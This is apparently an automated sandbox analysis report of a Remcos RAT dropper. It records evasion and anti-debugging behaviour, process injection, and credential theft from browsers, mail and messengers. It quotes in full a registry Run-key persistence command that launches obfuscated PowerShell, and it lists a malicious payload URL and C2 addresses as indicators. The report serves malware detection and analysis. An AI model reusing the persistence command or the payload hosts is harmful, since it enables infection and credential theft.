            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeAPI/Special instruction interceptor: Address: 4567AE3
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6487Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3117Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeWindow / User API: threadDelayed 1594Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeWindow / User API: threadDelayed 8392Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeAPI coverage: 4.3 %
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeAPI coverage: 9.9 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4428Thread sleep time: -7378697629483816s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520Thread sleep count: 1594 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520Thread sleep time: -4782000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520Thread sleep count: 8392 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exe TID: 2520Thread sleep time: -25176000s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040595A
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040658F FindFirstFileW,FindClose,0_2_0040658F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_0040595A
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_00402862 FindFirstFileW,7_2_00402862
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_0040658F FindFirstFileW,FindClose,7_2_0040658F
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_23BC10F1
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040AE51 FindFirstFileW,FindNextFileW,11_2_0040AE51
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407EF8
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 13_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407898
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_00418981 memset,GetSystemInfo,11_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeAPI call chain: ExitProcess graph end nodegraph_0-3874
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeAPI call chain: ExitProcess graph end nodegraph_0-3870
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeAPI call chain: ExitProcess graph end node
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_02CFD8D0 LdrInitializeThunk,LdrInitializeThunk,1_2_02CFD8D0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_23BC2639
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,11_2_0040DD85
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC4AB4 mov eax, dword ptr fs:[00000030h]7_2_23BC4AB4
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC724E GetProcessHeap,7_2_23BC724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_23BC2B1C
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_23BC2639
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_23BC60E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Conspect124.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Conspect124.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\Conspect124.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Conspect124.exe base: 1730000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Conspect124.exe base: 19FFF4Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe "C:\Users\user\AppData\Local\Temp\Conspect124.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\llsemopjpzfqlbiqwdrulxfexi"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\vnfxngzclhxvohwunodvwkzvgosxx"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Users\user\AppData\Local\Temp\Conspect124.exe C:\Users\user\AppData\Local\Temp\Conspect124.exe /stext "C:\Users\user\AppData\Local\Temp\fhlpgzkezppayvsywzqpzpmegvkgywqb"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Begunstigelses% -windowstyle minimized $Hjtryksryg=(Get-ItemProperty -Path 'HKCU:\Forseglingens\').Drenching;%Begunstigelses% ($Hjtryksryg)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%begunstigelses% -windowstyle minimized $hjtryksryg=(get-itemproperty -path 'hkcu:\forseglingens\').drenching;%begunstigelses% ($hjtryksryg)"
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "startup key" /t reg_expand_sz /d "%begunstigelses% -windowstyle minimized $hjtryksryg=(get-itemproperty -path 'hkcu:\forseglingens\').drenching;%begunstigelses% ($hjtryksryg)"Jump to behavior
            Source: Conspect124.exe, 00000007.00000002.4164560260.0000000006F8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: Conspect124.exe, 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: Conspect124.exe, 00000007.00000002.4164560260.0000000006F8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC=
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC2933 cpuid 7_2_23BC2933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 7_2_23BC2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_23BC2264
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: 12_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,12_2_004082CD
            Source: C:\Users\user\Desktop\SDWLLRJcsY.exeCode function: 0_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040333D
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
            Tries to steal Mail credentials (via file registry)
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: ESMTPPassword12_2_004033F0
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3

            Remote Access Functionality

            barindex
            Detected Remcos RAT
            Source: C:\Users\user\AppData\Local\Temp\Conspect124.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECXJump to behavior
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3216390468.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000003.3189713454.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4164316421.0000000006F06000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Conspect124.exe PID: 1800, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts11
            Native API            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		2
            Obfuscated Files or Information            		2
            Credentials in Registry            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts12
            Command and Scripting Interpreter            		Logon Script (Windows)212
            Process Injection            		2
            Software Packing            		1
            Credentials In Files            		3
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		1
            Non-Standard Port            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login Hook1
            Registry Run Keys / Startup Folder            		1
            DLL Side-Loading            		NTDS129
            System Information Discovery            		Distributed Component Object Model2
            Clipboard Data            		1
            Remote Access Software            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets341
            Security Software Discovery            		SSHKeylogging2
            Non-Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Modify Registry            		Cached Domain Credentials131
            Virtualization/Sandbox Evasion            		VNCGUI Input Capture13
            Application Layer Protocol            		Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items131
            Virtualization/Sandbox Evasion            		DCSync4
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518329 Sample: SDWLLRJcsY.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 43 geoplugin.net 2->43 45 cmgtrading.eu 2->45 53 Suricata IDS alerts for network traffic 2->53 55 Antivirus detection for URL or domain 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 4 other signatures 2->59 10 SDWLLRJcsY.exe 3 31 2->10         started        signatures3 process4 file5 37 C:\Users\user\AppData\Roaming\...\Papyr.paa, ASCII 10->37 dropped 75 Suspicious powershell command line found 10->75 14 powershell.exe 20 10->14         started        signatures6 process7 file8 39 C:\Users\user\AppData\...\Conspect124.exe, PE32 14->39 dropped 41 C:\Users\...\Conspect124.exe:Zone.Identifier, ASCII 14->41 dropped 77 Writes to foreign memory regions 14->77 79 Found suspicious powershell code related to unpacking or dynamic code loading 14->79 81 Hides threads from debuggers 14->81 83 Powershell drops PE file 14->83 18 Conspect124.exe 5 14 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 47 107.173.4.16, 2404, 64860, 64862 AS-COLOCROSSINGUS United States 18->47 49 geoplugin.net 178.237.33.50, 64861, 80 ATOM86-ASATOM86NL Netherlands 18->49 51 cmgtrading.eu 185.26.107.57, 443, 64858, 64859 ATE-ASFR France 18->51 61 Multi AV Scanner detection for dropped file 18->61 63 Detected unpacking (changes PE section rights) 18->63 65 Detected Remcos RAT 18->65 67 4 other signatures 18->67 24 Conspect124.exe 1 18->24         started        27 Conspect124.exe 1 18->27         started        29 Conspect124.exe 14 18->29         started        31 cmd.exe 1 18->31         started        signatures12 process13 signatures14 69 Tries to steal Instant Messenger accounts or passwords 24->69 71 Tries to harvest and steal browser information (history, passwords, etc) 24->71 73 Tries to steal Mail credentials (via file / registry access) 27->73 33 conhost.exe 31->33         started        35 reg.exe 1 1 31->35         started        process15

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SDWLLRJcsY.exe13%ReversingLabs

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Conspect124.exe13%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            http://geoplugin.net/json.gp0%URL Reputationsafe
            https://aka.ms/pscore6lB0%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://geoplugin.net/json.gplH0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpd0%Avira URL Cloudsafe
            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpl0%Avira URL Cloudsafe
            http://www.imvu.comr0%Avira URL Cloudsafe
            http://www.imvu.com0%Avira URL Cloudsafe
            https://github.com/Pester/Pester0%Avira URL Cloudsafe
            http://geoplugin.net/json.gpy0%Avira URL Cloudsafe
            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp.0%Avira URL Cloudsafe
            https://cmgtrading.eu/eODGqfP132.binC0%Avira URL Cloudsafe
            http://geoplugin.net/json.gp50%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
            https://login.yahoo.com/config/login0%Avira URL Cloudsafe
            http://www.nirsoft.net/0%Avira URL Cloudsafe
            http://www.ebuddy.com0%Avira URL Cloudsafe
            https://cmgtrading.eu/eODGqfP132.bin100%Avira URL Cloudmalware
            http://cmgtrading.eu/eODGqfP132.bin100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            cmgtrading.eu
            		185.26.107.57
            		truefalse
              		unknown
              geoplugin.net
              		178.237.33.50
              		truefalse
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                • URL Reputation: safe
                		unknown
                https://cmgtrading.eu/eODGqfP132.binfalse
                • Avira URL Cloud: malware
                		unknown
                http://cmgtrading.eu/eODGqfP132.binfalse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
